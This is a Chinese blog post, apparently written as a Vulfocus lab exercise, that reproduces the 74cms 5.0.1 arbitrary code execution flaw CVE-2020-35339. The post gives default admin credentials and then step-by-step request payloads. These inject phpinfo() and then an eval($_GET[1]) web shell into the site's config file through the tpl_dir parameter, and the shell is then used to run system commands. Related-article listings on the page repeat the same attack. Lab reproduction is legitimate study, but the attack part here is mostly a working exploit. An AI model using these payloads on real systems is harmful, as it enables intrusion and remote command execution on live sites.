vulfocus——骑士cms任意代码执行(CVE-2020-35339)

最新推荐文章于 2022-11-22 09:45:29 发布
最新推荐文章于 2022-11-22 09:45:29 发布
阅读量972 收藏 3
点赞数 1
分类专栏: vulfocus复现 文章标签: servlet jar java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62063669/article/details/126905775
版权

描述

骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。

后台账号密码均为adminadmin

复现

1.打开web页面

2.找到后台登陆界面

ip:port/index.php?m=Admin&c=index&a=login 

3.在第三步进行抓包

 

4.构造Payload验证漏洞存在 

/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),'

5.访问shell地址:/Application/Home/Conf/config.php

6.getshell (改包)

/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_GET[1]),'

 

7.命令执行

/Application/Home/Conf/config.php?1=system(“ls /tmp”);

(不知道这里为什么没出现flag,然后在phpinfo找到flag)

隐身的菜鸟
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
骑士cms任意代码执行CVE-2020-35339
最新发布
m0_65150886的博客
01-02 532
在74CMS 5.0.1版本中的管理后台由于过滤不严谨,可以向配置文件写入恶意代码导致任意代码执行。5.此时再进行登录,登录成功后,只会显示更详细的phpinfo界面,没有其他内容,建议不要随便使用。3.进入后台后,点击:系统——网站配置——在网站域名中填写下面数据使页面返回phpinfo。4.然后保存,保存后刷新当前页面,phpinfo页面便映入眼帘。然后修改一下代码,便可以直接getshell。账号:adminadmin。1.访问ip:port。6.修改回原先配置信息。
74cms 任意代码执行CVE-2020-35339
weixin_44047654的博客
11-22 1178
74cms 任意代码执行CVE-2020-35339
在线复现漏洞cve-2020-35339(加日常想法)
FODKING的博客
04-20 1429
最近有半年没写了,感觉有很多东西想写,还是怕没人看,近期发现了一个在线的漏洞测试平台,大家可以看看。
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
骑士CMS 远程代码执行分析 - Panda1
08-03
0x01 知识背景骑 CMS 采的同样是 Thinkphp 框架,不过其版本是 3.2.3,我们知道 3.2.3 的标准 URL 路径如下:http://ser
74cms 骑士人才系统 v5.0.1 正式版
10-22
骑士cms人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才系统已成国内同类软件中的最好用的人才系统。 骑士cms人才系统 v5.0.1 更新内容:新增:后台增加跳转页面新增:短信预警提醒,方便客户及时充值新增:企业与个人账号通用新增:未付费且登录的企业单独呈现,方便追踪客户新增:后台统计增加列表页。方便追踪客户新增:导出简历增加时间段、年龄段、性别等条件筛选新增:简历增加项目经验新增:PC端支持https新增:对接企查查新增:关注公众号领红包,快速吸粉新增:专题招聘会触屏版新增:事业单位招考触屏版新增:企业专访触屏版新增:内置节日主题优化:表单填写优化:提交操作增加等待提醒优化:套餐改为点数,对简历进行分级收费优化:小程序深度优化优化:系统日志显示企业名称与个人名字,方便追踪客户
gamblingmaster2020#0day-1#74cms v5.0.1前台sql注入1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
74CMS 5.0.1后台getshell(CVE-2020-35339)分析
qq_41252520的博客
02-18 2860
0x0 漏洞简介 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。 2016年全新推出骑士人才系统基础版,全新的
Vulfocus 入门+初级
大雾
05-20 3556
名称: 命令执行漏洞 描述: 命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限 命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码执行 flag 存放在tmp路径下 名称: vulshare/python-flag:latest 描述: 目录浏览漏洞属于目录遍历漏洞的一种,目录浏览漏洞是由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置.
骑士cms骑士cms快速搭建
xiaomaseo的博客
03-23 1716
骑士cms,如何让人才网快速建站,人才招聘一直是一个有市场的行业,特别是近些年来互联网发展的速度越来越快,人才招聘的重心在不断的向线上招聘转移,骑士cms的作用就是为人才网站提供人才招聘的各项功能,在这种阶段可以选用骑士cms系统的基础版,通过一系列基础的发布职位、下载简历、职位置顶、简历置顶等实用功能,能够保证人才网站在低成本运营的同时还有机会实现流量转化。 骑士cms可以实现云端一键升级,告别传统的FTP上传下载的覆盖升级方式,现在只需骑士cms后台一键完成升级。使用简单便捷,支持升级回滚操.
74cms v5.0.1 漏洞复现
p_lang的博客
04-30 3236
一、环境搭建 这里用到PHPstudy+VMware+Windows7(IP:192.168.253.131)进行环境搭建,且是在本地进行测试。 1.首先在官网下载74cms v5.0.1版本的安装包:http://www.74cms.com/download/index.html 2.将下载好的压缩包文件解压并放至PHPstudy的WWW目录下。 3.打开 192.168.253.131/74cms_Home_Setup_v5.0.1/upload/install.php 并系统安装。 OK,
PTB-CVE
zip471642048的博客
05-05 1003
文章目录Apache HTTPD 多后缀解析漏洞 Apache HTTPD 多后缀解析漏洞 如果运维人员给.php后缀增加了处理器: AddHandler application/x-httpd-php .php 那么,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。 上传一个以jpg为后缀的一句话木马但是包含.php 会被成功解析成php ...
Apache Unomi 1.5.2以下版本面临CVE-2020-13942远程代码执行漏洞
"CVE-2020-13942 是一个针对Apache Unomi的严重安全漏洞,涉及远程代码执行(Remote Code Execution, RCE)风险。Apache Unomi 是一款开源的事件管理和分析平台,用于收集、处理和分析应用程序的日志和事件数据。这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值